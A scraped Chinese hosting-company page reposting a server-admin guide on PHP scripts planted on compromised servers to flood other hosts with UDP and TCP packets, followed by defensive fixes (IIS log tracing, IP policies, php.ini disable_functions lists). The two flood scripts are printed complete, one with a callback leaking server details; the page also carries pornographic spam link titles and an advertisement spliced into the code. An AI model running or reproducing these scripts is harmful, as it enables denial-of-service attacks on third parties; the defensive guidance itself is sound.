日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
php對(duì)外發(fā)包引發(fā)服務(wù)器崩潰的終極解決方法分享[推薦]
一、php對(duì)外發(fā)包分析
用php代碼調(diào)用sockets,直接用服務(wù)器的網(wǎng)絡(luò)攻擊別的IP,常見代碼如下:


復(fù)制代碼 代碼如下:

$packets = 0;

$ip = $_GET[\'ip\'];

$rand = $_GET[\'port\'];

set_time_limit(0);

ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();

print \"Flooded: $ip on port $rand

\";

$max_time = $time+$exec_time;

成都創(chuàng)新互聯(lián)-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價(jià)比錦州網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式錦州網(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設(shè)找我們,業(yè)務(wù)覆蓋錦州地區(qū)。費(fèi)用合理售后完善,十年實(shí)體公司更值得信賴。

for($i=0;$i<65535;$i++){

$out .= \"X\";

}

while(1){

$packets++;

if(time() > $max_time){

break;

}

$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo \"Packet complete at \".time(\'h:i:s\').\" with

$packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \".

round($packets/$exec_time, 2) . \" packets/s \\n\";

?>

二、表現(xiàn)特征
一打開IIS,服務(wù)器的流出帶寬就用光-----就是說(shuō)服務(wù)器不斷向別人發(fā)包,這個(gè)情況和受到DDOS攻擊是不同的,DDOS是服務(wù)器不斷收到大量數(shù)據(jù)包.

近期由于DEDECMS出現(xiàn)漏洞而導(dǎo)致大量服務(wù)器出現(xiàn)這個(gè)問(wèn)題.

如何快速找到這些站?

你可以打開日志

C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打開今天時(shí)間的文件,

里面有類似這樣的記錄:

2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1

最后三項(xiàng) 783 Disabled 30_FreeHost_1

783就是這個(gè)站在IIS中的ID

30_FreeHost_1就是所在池

三、解決辦法
1.按上述找到這個(gè)網(wǎng)站后停止它.或停止池,并重啟IIS.

2.在IP策略,或防火墻中,禁止所有udp向外發(fā)送

在星外最新版本的安全包中,已帶有4.0版本的IP策略【下載safe包】,您導(dǎo)入后就直接可以限制了外發(fā)的UDP包。下載這個(gè)包,之后導(dǎo)入安全策略。但這個(gè)策略并沒(méi)有關(guān)閉DNS端口,部分攻擊還是有效.

為了解決這個(gè)問(wèn)題,你也可以調(diào)整IP策略,限制udp只能訪問(wèn)特定的DNS服務(wù)器IP,如8.8.8.8,除非黑客攻擊這個(gè)IP,不然攻擊也是無(wú)效的,你可以在網(wǎng)卡DNS中設(shè)置一個(gè)你才知道的DNS IP,并且不要公開,然后調(diào)用IP策略中的udp open部分就可以解決.(打開IP策略的屬性,雙擊open,將open中的兩條udp記錄刪除任意一條,在保留的這條中,雙擊,改成 地址 從源地址 任何地址 到目標(biāo)地址 "特定IP 這個(gè)IP就是設(shè)置為你自己的DNS IP,如8.8.8.8" 保存后就行了 )

在2011-4-27,我們上傳了新的安全包,里面有一個(gè)"星外虛擬主機(jī)管理平臺(tái)IP策略關(guān)閉所有UDP端口用.ipsec"文件,您可以導(dǎo)入它并啟用,就可以關(guān)閉所有udp端口,就可以完全防止這類攻擊,但是,這個(gè)策略由于關(guān)閉了DNS端口,會(huì)造成的這臺(tái)服務(wù)器上無(wú)法用IE訪問(wèn)任何域名,因此,用戶的采集功能也就用不了.(同樣,如果在主控網(wǎng)站上用了這個(gè)策略,就會(huì)造成的受控自檢不通過(guò),因?yàn)榻馕霾涣擞蛎?另外,部分用戶反映此策略會(huì)造成的mysql不正常)

3.用一流信息監(jiān)控,在SQL攔截及網(wǎng)址攔截中,攔截port=這個(gè)關(guān)鍵詞(其他關(guān)鍵詞可以刪除.)

4.也可以直接禁止上面的代碼,如改win\php.ini后重啟IIS

ignore_user_abort = On

(注意前面的;號(hào)要?jiǎng)h除)

disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,

在后面加上

fsockopen,set_time_limit

但這樣會(huì)造成很多php程序都不正常.

另外,這也表明你的服務(wù)器安全做得不錯(cuò),如果能入侵.黑客就直接提權(quán)了,還DOS做什么?

近期已有新的基于TCP攻擊的PHPDDOS代碼如下:


復(fù)制代碼 代碼如下:

set_time_limit(999999);

$host = $_GET['host'];

$port = $_GET['port'];

$exec_time = $_GET['time'];

$packets = 64;

ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){

if (StrLen($_GET['rat'])<>0){

echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".

php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];

exit;

}

exit;

}

$max_time = time()+$exec_time;

while(1){

$packets++;

if(time() > $max_time or $exec_time != 69){

break;

}

$fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0);

}

?>

同樣,可以采有以下解決辦法:

1.也可以直接禁止上面的代碼,如改win\php.ini后重啟IIS

ignore_user_abort = On

(注意前面的;號(hào)要?jiǎng)h除)

disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,

在后面加上

fsockopen,set_time_limit

但這樣會(huì)造成很多php程序都不正常.

2.在IP策略中禁止所有外訪的TCP數(shù)據(jù)包,但這樣會(huì)造成的采集功能無(wú)效,也不能用在主控服務(wù)器上。

3.在服務(wù)器要用關(guān)鍵詞tcp:或udp:搜索所有php類文件,找到攻擊文件,刪除它。

以上方法供 vps、服務(wù)器托管用戶學(xué)習(xí)!


網(wǎng)頁(yè)名稱:php對(duì)外發(fā)包引發(fā)服務(wù)器崩潰的終極解決方法分享[推薦]
文章起源:http://www.5511xx.com/article/dpgggdp.html